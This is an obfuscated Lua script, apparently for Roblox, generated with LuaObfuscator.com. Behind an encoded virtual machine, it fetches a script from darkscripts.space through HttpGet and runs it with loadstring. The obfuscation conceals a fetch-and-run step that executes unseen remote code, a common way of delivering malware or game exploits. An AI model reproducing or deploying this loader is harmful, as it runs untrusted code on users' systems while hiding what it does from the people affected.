--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v86=0;while true do if (v86==0) then v19=v0(v3(v30,1,1));return "";end end else local v87=v2(v0(v30,16));if v19 then local v111=0;local v112;while true do if (v111==0) then v112=v5(v87,v19);v19=nil;v111=1;end if (v111==1) then return v112;end end else return v87;end end end);local function v20(v31,v32,v33) if v33 then local v88=(v31/(((1642 -(1523 + 114)) -3)^(v32-1)))%(2^(((v33-(2 -1)) -(v32-(1 -0))) + (2 -(1 + 0)))) ;return v88-(v88%(620 -((790 -235) + 64))) ;else local v89=931 -(857 + (951 -(282 + 595))) ;local v90;while true do if (v89==(568 -(367 + 201))) then v90=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v90 + v90))>=v90) and (1 + 0)) or 0 ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (1067 -(68 + 997)) );v18=v18 + (1272 -(226 + 1044)) ;return (v36 * (1114 -858)) + v35 ;end local function v23() local v37=0;local v38;local v39;local v40;local v41;while true do if (v37==(117 -(32 + (435 -(87 + 263))))) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 1 + 3 ;v37=958 -(892 + 65) ;end if (v37==(2 -1)) then return (v41 * (31011612 -14234396)) + (v40 * (120312 -54776)) + (v39 * 256) + v38 ;end end end local function v24() local v42=180 -(67 + 113) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(2 + (0 -0))) then v47=v20(v44,21,75 -(482 -(145 + 293)) );v48=((v20(v44,24 + (438 -(44 + 386)) )==(3 -2)) and  -(953 -(802 + 150))) or (2 -1) ;v42=5 -2 ;end if (v42==0) then v43=v23();v44=v23();v42=1;end if (v42==(3 + 0)) then if (v47==(997 -(915 + 82))) then if (v46==((1486 -(998 + 488)) -0)) then return v48 * (0 + 0 + 0) ;else v47=1 -0 ;v45=1187 -(1069 + 118) ;end elseif (v47==(4643 -2596)) then return ((v46==(0 -0)) and (v48 * (1/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(1817 -794) ) * (v45 + (v46/((2 + 0)^(843 -(368 + 347 + 76))))) ;end if (v42==(3 -2)) then v45=19 -(10 + 8) ;v46=(v20(v44,1,76 -(828 -(201 + 571)) ) * ((444 -(416 + (1164 -(116 + 1022))))^(102 -70))) + v43 ;v42=1 + 1 ;end end end local function v25(v49) local v50=0 -0 ;local v51;local v52;while true do if (v50==0) then v51=nil;if  not v49 then v49=v23();if (v49==(0 + 0)) then return "";end end v50=3 -(887 -(261 + 624)) ;end if (v50==(7 -(8 -3))) then v52={};for v113=1081 -(1020 + 60) , #v51 do v52[v113]=v2(v1(v3(v51,v113,v113)));end v50=862 -((2237 -(630 + 793)) + 45) ;end if (v50==(7 -4)) then return v6(v52);end if (v50==(1 + 0)) then v51=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;v50=2;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 0 -0 ;end)();local v92=(function() return;end)();local v93=(function() return;end)();while true do if (v91== #"[") then if (v92== #"{") then v93=(function() return v94()~=0 ;end)();elseif (v92==2) then v93=(function() return v95();end)();elseif (v92== #"xxx") then v93=(function() return v96();end)();end v97[v98]=(function() return v93;end)();break;end if (v91==0) then local v120=(function() return 0;end)();local v121=(function() return;end)();while true do if (0==v120) then v121=(function() return 0;end)();while true do if (v121~=(1 -0)) then else v91=(function() return  #">";end)();break;end if ((0 -0)==v121) then v92=(function() return v94();end)();v93=(function() return nil;end)();v121=(function() return 1;end)();end end break;end end end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v54=(function() return function(v99,v100,v101) local v102=(function() return 285 -(134 + 151) ;end)();local v103=(function() return;end)();while true do if (v102==0) then v103=(function() return 1665 -(970 + 695) ;end)();while true do if (v103==0) then v99[v100-#"}" ]=(function() return v101();end)();return v99,v100,v101;end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v68= #",",v59 do FlatIdent_69270,Type,Cons,v21,v24,v25,v60,v68=(function() return v53(FlatIdent_69270,Type,Cons,v21,v24,v25,v60,v68);end)();end v58[ #"xnx"]=(function() return v21();end)();for v69= #"{",v23() do local v70=(function() return v21();end)();if (v20(v70, #"]", #",")==0) then local v106=(function() return 0 -0 ;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if (v106~=(1990 -(582 + 1408))) then else v107=(function() return 0 -0 ;end)();v108=(function() return nil;end)();v106=(function() return 1;end)();end if (v106==2) then while true do if (v107== #">") then local v126=(function() return 0 -0 ;end)();local v127=(function() return;end)();while true do if (v126==(0 -0)) then v127=(function() return 1824 -(1195 + 629) ;end)();while true do if (v127~=0) then else v110=(function() return {v22(),v22(),nil,nil};end)();if (v108==0) then local v176=(function() return 0;end)();local v177=(function() return;end)();while true do if (0~=v176) then else v177=(function() return 0;end)();while true do if (v177~=(241 -(187 + 54))) then else v110[ #"gha"]=(function() return v22();end)();v110[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v108== #"|") then v110[ #"gha"]=(function() return v23();end)();elseif (v108==(782 -(162 + 618))) then v110[ #"xxx"]=(function() return v23() -((2 + 0)^16) ;end)();elseif (v108~= #"-19") then else local v189=(function() return 0 + 0 ;end)();local v190=(function() return;end)();while true do if (v189~=0) then else v190=(function() return 0 -0 ;end)();while true do if (v190==0) then v110[ #"xxx"]=(function() return v23() -(2^(26 -10)) ;end)();v110[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v127=(function() return 1;end)();end if ((1 + 0)~=v127) then else v107=(function() return 1638 -(1373 + 263) ;end)();break;end end break;end end end if (v107== #"-19") then if (v20(v109, #"91(", #"xnx")== #" ") then v110[ #"asd1"]=(function() return v60[v110[ #"0313"]];end)();end v55[v69]=(function() return v110;end)();break;end if (v107~=0) then else local v129=(function() return 1000 -(451 + 549) ;end)();local v130=(function() return;end)();while true do if (v129==(0 + 0)) then v130=(function() return 0 -0 ;end)();while true do if (v130~=0) then else v108=(function() return v20(v70,2, #"nil");end)();v109=(function() return v20(v70, #"asd1",9 -3 );end)();v130=(function() return 1;end)();end if ((1385 -(746 + 638))~=v130) then else v107=(function() return  #"<";end)();break;end end break;end end end if (v107~=2) then else local v131=(function() return 0 + 0 ;end)();while true do if (v131==0) then if (v20(v109, #"|", #" ")~= #"!") then else v110[2]=(function() return v60[v110[2]];end)();end if (v20(v109,2 -0 ,343 -(218 + 123) )== #":") then v110[ #"xnx"]=(function() return v60[v110[ #"nil"]];end)();end v131=(function() return 1582 -(1535 + 46) ;end)();end if (v131~=(1 + 0)) then else v107=(function() return  #"19(";end)();break;end end end end break;end if (v106==1) then local v124=(function() return 0;end)();while true do if (v124~=1) then else v106=(function() return 2;end)();break;end if (v124~=(0 + 0)) then else v109=(function() return nil;end)();v110=(function() return nil;end)();v124=(function() return 561 -(306 + 254) ;end)();end end end end end end for v71= #"[",v23() do v56,v71,v28=(function() return v54(v56,v71,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[1 + 0 ];local v66=v62[3 -1 ];local v67=v62[1470 -(899 + 568) ];return function(...) local v72=v65;local v73=v66;local v74=v67;local v75=v27;local v76=3 -2 ;local v77= -(1 + 0);local v78={};local v79={...};local v80=v12("#",...) -(851 -(20 + 830)) ;local v81={};local v82={};for v104=603 -(207 + 61 + 335) ,v80 do if (v104>=v74) then v78[v104-v74 ]=v79[v104 + (291 -((536 -(41 + 435)) + 230)) ];else v82[v104]=v79[v104 + (573 -(426 + 146)) ];end end local v83=(v80-v74) + (739 -(542 + 196)) ;local v84;local v85;while true do local v105=0 + 0 ;while true do if (v105==(1457 -(282 + 1174))) then if ((1283<=4997) and (v85<=(818 -(569 + 242)))) then if ((v85<=(1 + (1003 -(938 + 63)))) or (3002<2579)) then if ((v85<=1) or (678>4744)) then if ((4342>3456) and (v85>(0 + 0))) then local v133=v84[5 -3 ];local v134=v82[v84[7 -4 ]];v82[v133 + 1 + 0 ]=v134;v82[v133]=v134[v84[1028 -(706 + 318) ]];else v82[v84[1253 -(721 + 530) ]]=v64[v84[1274 -(945 + 326) ]];end elseif (v85==(4 -2)) then do return;end else local v140=0 + 0 ;local v141;while true do if (v140==(377 -(142 + 235))) then v141=v84[702 -(271 + 330 + 99) ];v82[v141]=v82[v141](v13(v82,v141 + (1126 -(936 + 189)) + 0 ,v77));break;end end end elseif (v85<=(982 -(182 + 371 + 424))) then if (v85>(7 -3)) then v82[v84[(3115 -(1565 + 48)) -(1408 + 92) ]]();else do return;end end elseif (v85>(6 + 0 + 0)) then v82[v84[1088 -(461 + 625) ]]=v84[1291 -(993 + 295) ]~=(0 + 0) ;else v82[v84[2]]=v84[1174 -(418 + (1891 -(782 + 356))) ];end elseif (v85<=(5 + 6)) then if ((v85<=(1 + (275 -(176 + 91)))) or (2368>2642)) then if ((2105==2105) and (v85>((7 -4) + 5))) then v82[v84[1 + 1 ]]=v84[6 -(4 -1) ]~=(529 -(406 + 123)) ;else local v146=1769 -(1749 + 20) ;local v147;local v148;local v149;local v150;while true do if ((1 + 1)==v146) then for v178=v147,v77 do local v179=1322 -(1249 + 73) ;while true do if (v179==(0 + (1092 -(975 + 117)))) then v150=v150 + (1146 -(466 + (2554 -(157 + 1718)))) ;v82[v178]=v148[v150];break;end end end break;end if ((0 + 0)==v146) then v147=v84[4 -2 ];v148,v149=v75(v82[v147](v13(v82,v147 + (2 -1) ,v84[1903 -(106 + 1794) ])));v146=1 + 0 ;end if ((1 + 0 + 0)==v146) then v77=(v149 + v147) -(1131 -((1309 -940) + 761)) ;v150=0;v146=5 -3 ;end end end elseif (v85>(27 -17)) then v82[v84[116 -((13 -9) + 110) ]]=v84[587 -(57 + 527) ];else v82[v84[(1019 -(697 + 321)) + 1 ]]();end elseif (v85<=(35 -22)) then if (v85==(1439 -(41 + 1386))) then v82[v84[2]]=v64[v84[339 -((304 -160) + 192) ]];else local v155=0;local v156;local v157;while true do if ((4012>=2179) and (v155==0)) then v156=v84[105 -((38 -21) + 86) ];v157=v82[v84[3 + 0 + 0 ]];v155=1 + (0 -0) ;end if (v155==(1 -0)) then v82[v156 + (2 -1) ]=v157;v82[v156]=v157[v84[170 -(122 + 44) ]];break;end end end elseif (v85==(42 -28)) then local v158=0 -0 ;local v159;local v160;local v161;local v162;while true do if (v158==(3 -(5 -3))) then v77=(v161 + v159) -((1228 -(322 + 905)) + 0) ;v162=(611 -(602 + 9)) + 0 ;v158=3 -1 ;end if ((4288>3111) and (v158==(65 -(30 + 35)))) then v159=v84[2 + 0 ];v160,v161=v75(v82[v159](v13(v82,v159 + 1 ,v84[11 -8 ])));v158=1258 -(1043 + 214) ;end if (v158==(7 -5)) then for v180=v159,v77 do v162=v162 + (1213 -(323 + (2078 -(449 + 740)))) ;v82[v180]=v160[v162];end break;end end else local v163=v84[5 -3 ];v82[v163]=v82[v163](v13(v82,v163 + (857 -(564 + (1164 -(826 + 46)))) ,v77));end v76=v76 + (581 -(361 + 219)) ;break;end if ((4160>639) and (v105==(320 -(53 + 267)))) then v84=v72[v76];v85=v84[2 -1 ];v105=1 + 0 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403303Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F736372697074732F633536333465303630662E6C756100093Q00120C3Q00013Q00120C000100023Q00200D00010001000300120B000300044Q0009000400014Q000E000100044Q000F5Q00022Q000A3Q000100012Q00023Q00017Q00",v9(),...);
